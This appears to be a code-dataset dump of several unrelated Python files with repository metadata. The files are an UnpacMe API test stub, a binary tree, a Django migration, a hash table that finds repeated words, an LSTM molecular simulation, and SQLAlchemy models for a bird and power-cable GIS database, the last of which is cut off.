blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
281
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
57
| license_type
stringclasses 2
values | repo_name
stringlengths 6
116
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 313
values | visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 18.2k
668M
⌀ | star_events_count
int64 0
102k
| fork_events_count
int64 0
38.2k
| gha_license_id
stringclasses 17
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 107
values | src_encoding
stringclasses 20
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 4
6.02M
| extension
stringclasses 78
values | content
stringlengths 2
6.02M
| authors
listlengths 1
1
| author
stringlengths 0
175
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
82499eb923a32ad19aeec1efd231f9c15b47ec86
|
62e7db04e60e07a6def7bc7e32e17d381ef0fa44
|
/test/test_unpack_status.py
|
712bddc93c308d9e45d7cfcafdaf90bb79d08937
|
[
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
] |
permissive
|
kryptoslogic/unpacme-python
|
0e830cb44fb137bd076f4100da736b929c8cd30b
|
86529853f24ed00afa7e90b87fa64104dfc68dfe
|
refs/heads/master
| 2023-02-26T16:17:57.047693 | 2021-02-02T14:23:47 | 2021-02-02T14:23:47 | 335,313,234 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,386 |
py
|
"""
UnpacMe
# Introduction Welcome to the UNPACME API! All the malware unpacking and file analysis features that you are familiar with on the [unpac.me](https://www.unpac.me/) website are available through our API. You can easily integrate our unpacker into your malware analysis pipeline and begin unpacking at scale! # Authentication The public UNPACME API is publicly available and can be accessed without authentication. In order to use the private UNPACME API you must sign up for an account with UNPACME. Once you have a valid user account you can view your personal API key in your user profile. <SecurityDefinitions /> # Response Structure When interacting with the UNPACME API, if the request was correctly handled, a <b>200</b> HTTP status code will be returned. The body of the response will usually be a JSON object (except for file downloads). ## Response Status Codes Status Code | Description | Notes ------------- | ------------- | - 200 | OK | The request was successful 400 | Bad Request | The request was somehow incorrect. This can be caused by missing arguments or arguments with wrong values. 401 | Unauthorized | The supplied credentials, if any, are not sufficient to access the resource 403 | Forbidden | The account does not have enough privileges to make the request. 404 | Not Found | The requested resource is not found 429 | Too Many Requests | The request frequency has exceeded one of the account quotas (minute, daily or monthly). Monthly quotas are reset on the 1st of the month at 00:00 UTC. 500 | Server Error | The server could not return the representation due to an internal server error ## Error Response If an error has occurred while handling the request an error status code will be returend along with a JSON error message with the following properties. Property | Description ------------- | ------------- Error | The error type Description | A more informative message # Example Clients The following clients can be used to interact with the UNPACME API directly and are provided as examples. These clients are community projects and are not maintained or developed by UNPACME. UNPACME makes no claim as to the safety of these clients, use at your own risk. - [UnpacMe Python Client](https://github.com/larsborn/UnpacMeClient) (Python) - [UnpacMe GO Client](https://github.com/kryptoslogic/unpacme-go) (Golang) - [UnpacMe Library](https://github.com/R3MRUM/unpacme) (Python) - [AssemblyLine](https://github.com/CybercentreCanada/assemblyline-service-unpacme) (Automation Service) <br> # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
import sys
import unittest
import unpacme
from unpacme.model.status import Status
from unpacme.model.unpack_status_all_of import UnpackStatusAllOf
globals()['Status'] = Status
globals()['UnpackStatusAllOf'] = UnpackStatusAllOf
from unpacme.model.unpack_status import UnpackStatus
class TestUnpackStatus(unittest.TestCase):
"""UnpackStatus unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testUnpackStatus(self):
"""Test UnpackStatus"""
# FIXME: construct object with mandatory attributes with example values
# model = UnpackStatus() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
3d613b080afe7af474f8504d12bf40d8034710ab
|
52b5773617a1b972a905de4d692540d26ff74926
|
/.history/binaryTree2_20200615152326.py
|
64f23d35b04053fcbead026e6e8a6c7c2d94f816
|
[] |
no_license
|
MaryanneNjeri/pythonModules
|
56f54bf098ae58ea069bf33f11ae94fa8eedcabc
|
f4e56b1e4dda2349267af634a46f6b9df6686020
|
refs/heads/master
| 2022-12-16T02:59:19.896129 | 2020-09-11T12:05:22 | 2020-09-11T12:05:22 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 396 |
py
|
# Create a node and assign a value to the node
class Node:
def __init__(self,data):
# designate one node as root
self.data = data
# then the two others as child nodes
self.left = None
self.right = None
# A
def printTree(self):
print(self.data)
root = Node(10)
root.left = Node(2)
root.right = Node(3)
root.printTree()
|
[
"[email protected]"
] | |
50ac7fee9fba9158cdaa1d59c98b29131acafa31
|
234c0ce6a3c867b882f5aa6c8eb260f1a48c70ac
|
/mysite/blog/migrations/0003_auto_20190304_1654.py
|
542615bc94cb88de9e5182da038b20998688ab20
|
[] |
no_license
|
mubarakmaddy/MySite
|
b32e064f3d09a1d2898f6e0cb07f316ab1436079
|
5650a8c108e2cabf990a8e0cfd2e66b69d68d839
|
refs/heads/master
| 2020-04-23T21:46:11.204773 | 2019-06-27T09:02:22 | 2019-06-27T09:02:22 | 171,480,172 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,009 |
py
|
# Generated by Django 2.1.7 on 2019-03-04 11:24
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('blog', '0002_postmodel_author_email'),
]
operations = [
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=100)),
('content', models.TextField()),
('date_posted', models.DateTimeField(default=django.utils.timezone.now)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.DeleteModel(
name='PostModel',
),
]
|
[
"[email protected]"
] | |
4c8316dcfdb30ccba4b2ac6a9c266ca950e5db88
|
7ad63f456925594105573cdf3eebdf719b19a1e1
|
/python/code_challenges/hashmap-repeated-word/hashmap_repeated_word/hashmap_repeated_word.py
|
c3099cd4b8bf4706efd1eea98ff4b79ab93fcd6b
|
[] |
no_license
|
laithfayizhussein/data-structures-and-algorithm
|
18425437b238a9fe1060daec13d3c6aa378093d4
|
c0ef81bc7e0aa04627d0b2a08a2070fbb3b01b65
|
refs/heads/master
| 2023-08-03T15:29:52.697073 | 2021-09-14T14:47:10 | 2021-09-14T14:47:10 | 373,604,346 | 1 | 0 | null | 2021-09-14T14:47:12 | 2021-06-03T18:25:08 |
JavaScript
|
UTF-8
|
Python
| false | false | 2,196 |
py
|
import re
class Node:
def __init__(self, data):
self.data=data
self.next=None
class LinkedList:
def __init__(self):
self.head=None
def add(self, data):
node=Node(data)
if not self.head:
self.head=node
else:
current=self.head
while current.next:
current=current.next
current.next=node
def __str__(self):
values =[]
current = self.head
while current:
values.append(current.data)
current = current.next
return f'{values}'
class Hash_table:
def __init__(self, size):
self.size = size
self.map = [None]*size
def hash(self, key):
ascii = 0
for ch in key:
ascii_ch = ord(ch)
ascii += ascii_ch
temp_value = ascii * 19
hashed_key = temp_value % self.size
return hashed_key
def add(self,key,value):
hashed_key = self.hash(key)
if not self.map[hashed_key]:
self.map[hashed_key] = LinkedList()
self.map[hashed_key].add((key,value))
def contains(self,key):
hashed_key=self.hash(key)
if self.map[hashed_key]:
self.map[hashed_key].head.data[0]
current=self.map[hashed_key].head
while current:
if current.data[0]==key:
return True
else:
current=current.next
return False
def get(self,key):
hashed_key = self.hash(key)
if self.map [hashed_key]:
self.map [hashed_key].head.data[0]
current=self.map[hashed_key].head
while current:
if current.data[0]== key:
return current.data[1]
else:
current=current.next
return None
def repeated_word(book=None):
if book==None:
return 'book is empty'
hash_table=Hash_table(1024)
book =re.sub('\W+', ' ',book).lower().split()
for word in book:
if hash_table.contains(word):
return word
else:
hash_table.add(word, True)
|
[
"[email protected]"
] | |
4db3e4c30c7da93ef32b7bb65f05b44b0b744e49
|
416ad9ba952c563b9600c040d72d4bea8c6ac926
|
/src/lstm.py
|
380ce67a2254f609e2192219a0070e0440e8661c
|
[] |
no_license
|
bokutotu/Simulate
|
3d990d75666abec8e5c07a90d8d4720137f95c7d
|
a95826127df4ffdcbbf2ccbadea8262aa84ccdd5
|
refs/heads/main
| 2023-06-21T01:04:19.079336 | 2021-07-20T13:30:54 | 2021-07-20T13:30:54 | 387,800,087 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,441 |
py
|
import numpy as np
import torch
import leapfrog
import preprocess
class LSTMLeapFrog(leapfrog.LeapFrog):
def __init__(self, sim_len, atom_num, norm,
chainlen_c, floatlen_c, chainlen_v, floatlen_v,
coord, velocity, force,
net_n, net_ca, net_c, net_o,
feature_len, name, in_channels, in_channels_o):
super().__init__(sim_len, atom_num, norm,
coord, velocity, force,
net_n, net_ca, net_c, net_o)
self.feature_len = feature_len
self.name = name
self.device = "cuda:0" if torch.cuda.is_available() else "cpu"
self.in_channels = in_channels
self.in_channels_o = in_channels_o
self.chainlen_c = chainlen_c
self.floatlen_c = floatlen_c
self.chainlen_v = chainlen_v
self.floatlen_v = floatlen_v
def before_sim(self):
self.res_coord = np.zeros((self.feature_len+self.sim_len, self.atom_num, 3), dtype=np.float32)
self.res_velocity = np.zeros((self.feature_len+self.sim_len, self.atom_num, 3), dtype=np.float32)
self.res_force = np.zeros((self.feature_len+self.sim_len, self.atom_num, 3), dtype=np.float32)
self.res_coord[0:self.feature_len] = self.coord
self.res_velocity[0:self.feature_len] = self.velocity
self.res_force[0:self.feature_len] = self.force
self.features_ca = np.zeros(
(self.sim_len + self.feature_len, self.atom_num//4+1, self.in_channels),
dtype=np.float32)
self.features_c = np.zeros(
(self.sim_len + self.feature_len, self.atom_num//4+1, self.in_channels),
dtype=np.float32)
self.features_n = np.zeros(
(self.sim_len + self.feature_len, self.atom_num//4+1, self.in_channels),
dtype=np.float32)
self.features_o = np.zeros(
(self.sim_len + self.feature_len, self.atom_num//4, self.in_channels_o),
dtype=np.float32)
# 一回目のために0~feature_len - 1 までの特徴量を作成
for time in range(self.feature_len-1):
f_n, f_ca, f_c, f_o, b_n, b_ca, b_c, b_o = \
preprocess.make_single(
chainlen_c=self.chainlen_c, floatlen_c=self.floatlen_c,
chainlen_v=self.chainlen_v, floatlen_v=self.floatlen_v,
atom_num=self.atom_num,
c=self.res_coord[time], v=self.res_velocity[time],
is_use_angles=True
)
self.features_n[time] = f_n
self.features_ca[time] = f_ca
self.features_c[time] = f_c
self.features_o[time] = f_o
def simulation_step(self, time):
# time - 1 の特徴量の計算と代入
f_n, f_ca, f_c, f_o, b_n, b_ca, b_c, b_o = \
preprocess.make_single(
chainlen_c=self.chainlen_c, floatlen_c=self.floatlen_c,
chainlen_v=self.chainlen_v, floatlen_v=self.floatlen_v,
atom_num=self.atom_num,
c=self.res_coord[time+self.feature_len-1],
v=self.res_velocity[time+self.feature_len-1],
is_use_angles=True
)
self.features_n[time+self.feature_len-1] = f_n
self.features_ca[time+self.feature_len-1] = f_ca
self.features_c[time+self.feature_len-1] = f_c
self.features_o[time+self.feature_len-1] = f_o
# 入力に必要な特徴量の切り出し
input_tensor_ca = torch.tensor(self.features_ca[time:time+self.feature_len]) \
.to(self.device)
input_tensor_c = torch.tensor(self.features_c[time:time+self.feature_len]) \
.to(self.device)
input_tensor_n = torch.tensor(self.features_n[time:time+self.feature_len]) \
.to(self.device)
input_tensor_o = torch.tensor(self.features_o[time:time+self.feature_len]) \
.to(self.device)
# ニューラルネットが学習する際の次元に変更する
# (features_len, atom_num, in_channnels) -> (atom_num, features_len, in_channnels)
input_tensor_c = input_tensor_c.transpose(0,1)
input_tensor_ca = input_tensor_ca.transpose(0,1)
input_tensor_n = input_tensor_n.transpose(0,1)
input_tensor_o = input_tensor_o.transpose(0,1)
# ニューラルネットで予測
force_n, force_ca, force_c, force_o = \
self.pred_nn(input_tensor_n, input_tensor_ca, input_tensor_c, input_tensor_o)
# 使用するのは一番最後に予測されたものを使用する
force_ca = force_ca[::, -1, ::]
force_c = force_c[::, -1, ::]
force_n = force_n[::, -1, ::]
force_o = force_o[::, -1, ::]
force = leapfrog.rotate_force(force_n,force_ca, force_c, force_o,
b_n, b_ca, b_c, b_o, self.atom_num, self.norm)
# 速度を計算する
v_now = leapfrog.cal_v_2(self.res_velocity[time+self.feature_len -1], self.mass, force)
self.res_velocity[time+self.feature_len] = v_now
# 座標を計算
c_now = leapfrog.cal_coord(self.res_coord[time, self.feature_len - 1], v_now)
self.res_coord[time + self.feature_len] = c_now
def save(self):
np.save(self.name, self.res_coord[self.feature_len:-1:])
|
[
"[email protected]"
] | |
b8c56deb337421b8e05a8a70c59c71923d4bf996
|
9039db1d63664122ac65176b1159d61eccc1ec61
|
/cables/models/__init__.py
|
1b560f4780f9466098aae59bf3a22d20f298f283
|
[] |
no_license
|
yjacolin/Avifaune-Cables_aeriens
|
8e28594c0a9b58084f3371e77ec49ed11d879a78
|
273b95be496d1b37163a40c4e2a92b60b733b903
|
refs/heads/master
| 2020-03-22T07:41:44.926554 | 2018-07-04T11:58:37 | 2018-07-04T11:58:37 | 139,718,598 | 0 | 0 | null | 2018-07-04T12:22:56 | 2018-07-04T12:22:55 | null |
UTF-8
|
Python
| false | false | 28,487 |
py
|
#-*- coding: utf-8 -*-
import logging
import sqlahelper
from sqlalchemy import BigInteger, Boolean, CheckConstraint, Column, Date, DateTime, Float, ForeignKey, Index, Integer, String, Table, Text, text, Unicode
from sqlalchemy.sql.sqltypes import NullType
from sqlalchemy.orm import relationship, mapper
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.ext.associationproxy import association_proxy
log = logging.getLogger(__name__)
Base = sqlahelper.get_base()
metadata = Base.metadata
DBSession = sqlahelper.get_session()
def outer_join_accessor_factory(collection_type, proxy):
def getter(obj):
if obj is None:
return None
return getattr(obj, proxy.value_attr)
def setter(obj, value):
setattr(obj, proxy.value_attr, value)
return getter, setter
class DicoAge(Base):
__tablename__ = 'dico_age'
id_age = Column(Integer, primary_key=True)
lib_age = Column(String(20))
class DicoCauseMortalite(Base):
__tablename__ = 'dico_cause_mortalite'
id_cause_mortalite = Column(Integer, primary_key=True)
lib_cause_mortalite = Column(String(20))
class DicoClassesRisque(Base):
__tablename__ = 'dico_classes_risque'
id_classe_risque = Column(Integer, primary_key=True, server_default=text("nextval('dico_classes_risque_id_classe_risque_seq'::regclass)"))
lib_classe_risque = Column(String(30))
class DicoNbEquipement(Base):
__tablename__ = 'dico_nb_equipements'
id_nb_equipements = Column(Integer, primary_key=True)
nb_equipements = Column(Integer)
class DicoSexe(Base):
__tablename__ = 'dico_sexe'
id_sexe = Column(Integer, primary_key=True)
lib_sexe = Column(String(20))
class DicoSource(Base):
__tablename__ = 'dico_source'
id_source = Column(Integer, primary_key=True)
lib_source = Column(String(20))
class DicoTypeEquipementPoteau(Base):
__tablename__ = 'dico_type_equipement_poteau'
id_type_equipement_poteau = Column(Integer, primary_key=True)
nom_type_equipement_poteau = Column(String)
class DicoTypeEquipementTroncon(Base):
__tablename__ = 'dico_type_equipement_troncon'
id_type_equipement_troncon = Column(Integer, primary_key=True)
nom_type_equipement_troncon = Column(String)
class DicoTypePoteauErdf(Base):
__tablename__ = 'dico_type_poteau_erdf'
id_type_poteau_erdf = Column(Integer, primary_key=True)
lib_type_poteau_erdf = Column(String)
class ErdfAppareilCoupure(Base):
__tablename__ = 'erdf_appareil_coupure'
__table_args__ = (
CheckConstraint(u"(public.geometrytype(geom) = 'POINT'::text) OR (geom IS NULL)"),
CheckConstraint(u'public.st_ndims(geom) = 2'),
CheckConstraint(u'public.st_srid(geom) = 4326')
)
id = Column(Integer, primary_key=True, server_default=text("nextval('erdf_appareil_coupure_id_seq'::regclass)"))
AUTOMATISM = Column(String(62))
AUTOMATIS1 = Column(String(62))
AUTOMATIS2 = Column(String(62))
POTEAU_HTA = Column(String(32))
STATUT = Column(String(12))
TYPE_DE_CO = Column(String(32))
T_L_COMMAN = Column(String(7))
SYMBOLOGIE = Column(String(64))
ANGLE = Column(Float(53))
SYSANGLE = Column(Float(53))
geom = Column(NullType, index=True)
geom_json = Column(String)
class ErdfConnexionAerienne(Base):
__tablename__ = 'erdf_connexion_aerienne'
__table_args__ = (
CheckConstraint(u"(public.geometrytype(geom) = 'POINT'::text) OR (geom IS NULL)"),
CheckConstraint(u'public.st_ndims(geom) = 2'),
CheckConstraint(u'public.st_srid(geom) = 4326')
)
id = Column(Integer, primary_key=True, server_default=text("nextval('erdf_connexion_aerienne_id_seq'::regclass)"))
POTEAU_HTA = Column(String(32))
STATUT = Column(String(12))
TYPE_DE_CO = Column(String(40))
SYMBOLOGIE = Column(String(64))
ANGLE = Column(Float(53))
SYSANGLE = Column(Float(53))
ID_SIG = Column(Integer)
geom = Column(NullType, index=True)
geom_json = Column(String)
class ErdfParafoudre(Base):
__tablename__ = 'erdf_parafoudre'
__table_args__ = (
CheckConstraint(u"(public.geometrytype(geom) = 'POINT'::text) OR (geom IS NULL)"),
CheckConstraint(u'public.st_ndims(geom) = 2'),
CheckConstraint(u'public.st_srid(geom) = 4326')
)
id = Column(Integer, primary_key=True, server_default=text("nextval('erdf_parafoudre_id_seq'::regclass)"))
POTEAU_HTA = Column(String(32))
STATUT = Column(String(12))
TYPE = Column(String(32))
SYMBOLOGIE = Column(String(64))
ANGLE = Column(Float(53))
SYSANGLE = Column(Float(53))
ID_SIG = Column(Integer)
geom = Column(NullType, index=True)
geom_json = Column(String)
class ErdfPosteElectrique(Base):
__tablename__ = 'erdf_poste_electrique'
__table_args__ = (
CheckConstraint(u"(public.geometrytype(geom) = 'POINT'::text) OR (geom IS NULL)"),
CheckConstraint(u'public.st_ndims(geom) = 2'),
CheckConstraint(u'public.st_srid(geom) = 4326')
)
id = Column(Integer, primary_key=True, server_default=text("nextval('erdf_poste_electrique_id_seq'::regclass)"))
FONCTION_P = Column(String(40))
NOM_DU_POS = Column(String(32))
POTEAU_HTA = Column(String(32))
STATUT = Column(String(12))
TYPE_DE_PO = Column(String(51))
SYMBOLOGIE = Column(String(64))
ANGLE = Column(Float(53))
SYSANGLE = Column(Float(53))
ID_SIG = Column(Integer)
geom = Column(NullType, index=True)
geom_json = Column(String)
class ErdfRemonteeAerosout(Base):
__tablename__ = 'erdf_remontee_aerosout'
__table_args__ = (
CheckConstraint(u"(public.geometrytype(geom) = 'POINT'::text) OR (geom IS NULL)"),
CheckConstraint(u'public.st_ndims(geom) = 2'),
CheckConstraint(u'public.st_srid(geom) = 4326')
)
id = Column(Integer, primary_key=True, server_default=text("nextval('erdf_remontee_aerosout_id_seq'::regclass)"))
APPAREIL_D = Column(String(32))
CONNEXION_ = Column(String(32))
HAUTEUR_PO = Column(Float(53))
INDICATEUR = Column(String(32))
PARAFOUDRE = Column(String(32))
PROTECTION = Column(String(7))
REMONT_E_A = Column(String(7))
STATUT = Column(String(12))
SYMBOLOGIE = Column(String(64))
ANGLE = Column(Float(53))
SYSANGLE = Column(Float(53))
ID_SIG = Column(Integer)
geom = Column(NullType, index=True)
geom_json = Column(String)
class ErdfTronconAerien(Base):
__tablename__ = 'erdf_troncon_aerien'
__table_args__ = (
CheckConstraint(u"(public.geometrytype(geom) = 'LINESTRING'::text) OR (geom IS NULL)"),
CheckConstraint(u'public.st_ndims(geom) = 2'),
CheckConstraint(u'public.st_srid(geom) = 4326')
)
STATUT = Column(String(12))
TECHNOLOGI = Column(String(32))
TECHNOLOG1 = Column(String(32))
SYMBOLOGIE = Column(String(64))
COMMENTAIR = Column(String(30))
geom = Column(NullType, index=True)
ID_SIG = Column(Integer)
id = Column(Integer, primary_key=True, server_default=text("nextval('erdf_troncon_aerien_id_seq'::regclass)"))
geom_json = Column(String)
class OgmCablesRemonteesMecanique(Base):
__tablename__ = 'ogm_cables_remontees_mecaniques'
__table_args__ = (
CheckConstraint(u'public.st_ndims(geom) = 2'),
CheckConstraint(u'public.st_srid(geom) = 4326')
)
geom = Column(NullType, index=True)
OBJECTID = Column(Integer)
idcable = Column(Integer, primary_key=True)
TypeInfra = Column(String(50))
NomInfra = Column(String(50))
IdDomaine = Column(Integer)
DateMontag = Column(DateTime)
DateDemont = Column(DateTime)
DateModif = Column(DateTime)
SHAPE_Leng = Column(Float(53))
geom_json = Column(String)
class OgmDomainesSkiable(Base):
__tablename__ = 'ogm_domaines_skiables'
__table_args__ = (
CheckConstraint(u'public.st_ndims(geom) = 2'),
CheckConstraint(u'public.st_srid(geom) = 4326')
)
geom = Column(NullType, index=True)
OBJECTID = Column(Integer)
iddomaine = Column(Integer, primary_key=True)
NomRDomain = Column(String(255))
IdExploita = Column(Integer)
Activite = Column(String(255))
MoOGM = Column(String(255))
Dpt = Column(String(100))
NomStation = Column(String(255))
SHAPE_Leng = Column(Float(53))
SHAPE_Area = Column(Float(53))
MoOGM_Vis = Column(String(255))
Annee_Plan = Column(Integer)
Surface_DS = Column(Integer)
geom_json = Column(String)
class OgmTronconsDangereux(Base):
__tablename__ = 'ogm_troncons_dangereux'
__table_args__ = (
CheckConstraint(u"(public.geometrytype(geom) = 'LINESTRING'::text) OR (geom IS NULL)"),
CheckConstraint(u'public.st_ndims(geom) = 2'),
CheckConstraint(u'public.st_srid(geom) = 4326')
)
geom = Column(NullType, index=True)
OBJECTID = Column(Integer)
idtd = Column(Integer, primary_key=True)
IdCable = Column(Integer)
Espece = Column(String(100))
Nombre = Column(Integer)
Estimation = Column(String(100))
Sexe = Column(String(20))
Age = Column(String(20))
idPyBas = Column(String(100))
idPyHt = Column(String(100))
NomObs = Column(String(100))
LongReelle = Column(Integer)
Date_ = Column(DateTime)
SHAPE_Leng = Column(Float(53))
geom_json = Column(String)
class OgmTronconsVisualise(Base):
__tablename__ = 'ogm_troncons_visualises'
__table_args__ = (
CheckConstraint(u'public.st_ndims(geom) = 2'),
CheckConstraint(u'public.st_srid(geom) = 4326')
)
geom = Column(NullType, index=True)
OBJECTID = Column(Integer)
idtv = Column(Integer, primary_key=True)
IdCable = Column(Integer)
TypeVisu = Column(String(255))
Financeur = Column(String(255))
Operateur = Column(String(255))
IdPyBas = Column(String(100))
IdPyHt = Column(String(100))
LongReelle = Column(Integer)
Date_visu = Column(DateTime)
SHAPE_Leng = Column(Float(53))
geom_json = Column(String)
class OgmTronconsVisualisesDangereux(Base):
__tablename__ = 'ogm_troncons_visualises_dangereux'
__table_args__ = (
CheckConstraint(u"(public.geometrytype(geom) = 'LINESTRING'::text) OR (geom IS NULL)"),
CheckConstraint(u'public.st_ndims(geom) = 2'),
CheckConstraint(u'public.st_srid(geom) = 4326')
)
geom = Column(NullType, index=True)
OBJECTID = Column(Integer)
Espece = Column(String(100))
Nombre = Column(Integer)
Estimation = Column(String(100))
Sexe = Column(String(20))
Age = Column(String(20))
idPyBas = Column(String(100))
idPyHt = Column(String(100))
NomObs = Column(String(100))
LongReelle = Column(Integer)
Date_ = Column(DateTime)
idtvd = Column(Integer, primary_key=True)
IdTV = Column(Integer)
Shape_Leng = Column(Float(53))
raisons = Column(String(255))
geom_json = Column(String)
class RteLigne(Base):
__tablename__ = 'rte_lignes'
__table_args__ = (
CheckConstraint(u"(public.geometrytype(geom) = 'LINESTRING'::text) OR (geom IS NULL)"),
CheckConstraint(u'public.st_ndims(geom) = 2'),
CheckConstraint(u'public.st_srid(geom) = 4326')
)
id_rte_ligne = Column(Integer, primary_key=True, server_default=text("nextval('rte_lignes_id_rte_ligne_seq'::regclass)"))
U_MAX = Column(String(20))
CONFIG = Column(String)
TERNE_EX = Column(Integer)
ADR_LIT_1 = Column(String)
ADR_LIT_2 = Column(String)
ADR_LIT_3 = Column(String)
geom = Column(NullType, index=True)
geom_json = Column(String)
class RtePoste(Base):
__tablename__ = 'rte_postes'
__table_args__ = (
CheckConstraint(u"(public.geometrytype(geom) = 'POINT'::text) OR (geom IS NULL)"),
CheckConstraint(u'public.st_ndims(geom) = 2'),
CheckConstraint(u'public.st_srid(geom) = 4326')
)
id_rte_poste = Column(Integer, primary_key=True, server_default=text("nextval('rte_postes_id_rte_poste_seq'::regclass)"))
U_MAX = Column(String(20))
LIBELLE = Column(String(64))
LIB_SUIT = Column(String(64))
geom = Column(NullType, index=True)
geom_json = Column(String)
class RtePoteaux(Base):
__tablename__ = 'rte_poteaux'
__table_args__ = (
CheckConstraint(u"(public.geometrytype(geom) = 'POINT'::text) OR (geom IS NULL)"),
CheckConstraint(u'public.st_ndims(geom) = 2'),
CheckConstraint(u'public.st_srid(geom) = 4326')
)
id_rte_poteaux = Column(Integer, primary_key=True, server_default=text("nextval('rte_poteaux_id_rte_poteaux_seq'::regclass)"))
U_MAX = Column(String(20))
NB_TERNE = Column(Integer)
geom = Column(NullType, index=True)
geom_json = Column(String)
class TAxesMigratoire(Base):
__tablename__ = 't_axes_migratoires'
__table_args__ = (
CheckConstraint(u"((public.geometrytype(geom) = 'POLYGON'::text) OR (public.geometrytype(geom) = 'MULTIPOLYGON'::text)) OR (geom IS NULL)"),
CheckConstraint(u'public.st_ndims(geom) = 2'),
CheckConstraint(u'public.st_srid(geom) = 4326')
)
id_axe_migratoire = Column(Integer, primary_key=True, server_default=text("nextval('t_axes_migratoires_id_axe_migratoire_seq'::regclass)"))
nom_axe_migratoire = Column(String(100))
migration = Column(Integer)
source = Column(String(100))
description = Column(String)
geom = Column(NullType, nullable=False, index=True)
geom_json = Column(String)
class TCasMortalite(Base):
__tablename__ = 't_cas_mortalite'
__table_args__ = (
CheckConstraint(u"(public.geometrytype(geom) = 'POINT'::text) OR (geom IS NULL)"),
CheckConstraint(u'public.st_ndims(geom) = 2'),
CheckConstraint(u'public.st_srid(geom) = 4326')
)
id_cas_mortalite = Column(Integer, primary_key=True, server_default=text("nextval('t_cas_mortalite_id_cas_mortalite_seq'::regclass)"))
id_espece = Column(ForeignKey(u't_especes.id_espece'), nullable=False)
source = Column(String(100))
id_cause_mortalite = Column(ForeignKey(u'dico_cause_mortalite.id_cause_mortalite'), nullable=False)
nb_cas = Column(Integer)
sexe = Column(String(30))
age = Column(String(30))
date = Column(Date)
geom = Column(NullType, index=True)
geom_json = Column(String)
dico_cause_mortalite = relationship(u'DicoCauseMortalite')
t_espece = relationship(u'TEspece')
class TCommune(Base):
__tablename__ = 't_communes'
__table_args__ = (
CheckConstraint(u'public.st_ndims(geom) = 2'),
CheckConstraint(u'public.st_srid(geom) = 4326')
)
insee = Column(Integer, primary_key=True)
nom_commune = Column(Unicode(100))
geom = Column(NullType, nullable=False, index=True)
geom_json = Column(String)
equipements = association_proxy('poteaux', 'equipements', getset_factory=outer_join_accessor_factory)
eq_troncons = association_proxy('troncons', 'equipements', getset_factory=outer_join_accessor_factory)
class TEquipementsPoteauxErdf(Base):
__tablename__ = 't_equipements_poteaux_erdf'
id_equipement_poteau_erdf = Column(Integer, primary_key=True, server_default=text("nextval('t_equipements_poteaux_erdf_id_equipement_poteau_erdf_seq'::regclass)"))
id_inventaire_poteau_erdf = Column(ForeignKey(u't_inventaire_poteaux_erdf.id_inventaire_poteau_erdf', ondelete=u'CASCADE', onupdate=u'CASCADE'))
id_type_equipement_poteau = Column(ForeignKey(u'dico_type_equipement_poteau.id_type_equipement_poteau'))
date_equipement = Column(Date)
login_saisie = Column(String(25))
mis_en_place = Column(Boolean, server_default=text("false"))
id_nb_equipements = Column(ForeignKey(u'dico_nb_equipements.id_nb_equipements'))
t_inventaire_poteaux_erdf = relationship(u'TInventairePoteauxErdf', backref="equipements")
dico_nb_equipement = relationship(u'DicoNbEquipement')
dico_type_equipement_poteau = relationship(u'DicoTypeEquipementPoteau')
class TEquipementsTronconsErdf(Base):
__tablename__ = 't_equipements_troncons_erdf'
__table_args__ = (
CheckConstraint(u"(public.geometrytype(geom) = 'LINESTRING'::text) OR (geom IS NULL)"),
CheckConstraint(u'public.st_ndims(geom) = 2'),
CheckConstraint(u'public.st_srid(geom) = 4326')
)
id_equipement_troncon_erdf = Column(Integer, primary_key=True, server_default=text("nextval('t_equipements_troncons_erdf_id_equipement_troncon_erdf_seq'::regclass)"))
id_inventaire_troncon_erdf = Column(ForeignKey(u't_inventaire_troncons_erdf.id_inventaire_troncon_erdf', ondelete=u'CASCADE', onupdate=u'CASCADE'))
id_type_equipement_troncon = Column(ForeignKey(u'dico_type_equipement_troncon.id_type_equipement_troncon'))
date_equipement_troncon = Column(Date)
geom = Column(NullType, index=True)
login_saisie = Column(String(25))
geom_json = Column(String)
t_inventaire_troncons_erdf = relationship(u'TInventaireTronconsErdf', backref="equipements")
dico_type_equipement_troncon = relationship(u'DicoTypeEquipementTroncon')
class TEspece(Base):
__tablename__ = 't_especes'
id_espece = Column(Integer, primary_key=True, server_default=text("nextval('t_especes_id_espece_seq'::regclass)"))
nom_espece = Column(String(100), nullable=False)
taille_zone_tampon = Column(Integer)
code_couleur = Column(String(20))
t_v_zones_sensibles = Table(
'v_zones_sensibles', metadata,
Column('id_zone_sensible', Integer, primary_key=True),
Column('nom_zone_sensible', String),
Column('niveau_sensibilite', Integer),
Column('nb_poteaux_inventories', BigInteger),
Column('nb_poteaux_inventories_risque_fort', BigInteger),
Column('nb_poteaux_inventories_risque_secondaire', BigInteger),
Column('nb_poteaux_inventories_risque_faible', BigInteger),
Column('nb_poteaux_equipes', BigInteger),
Column('nb_poteaux_equipes_risque_fort', BigInteger),
Column('nb_poteaux_equipes_risque_secondaire', BigInteger),
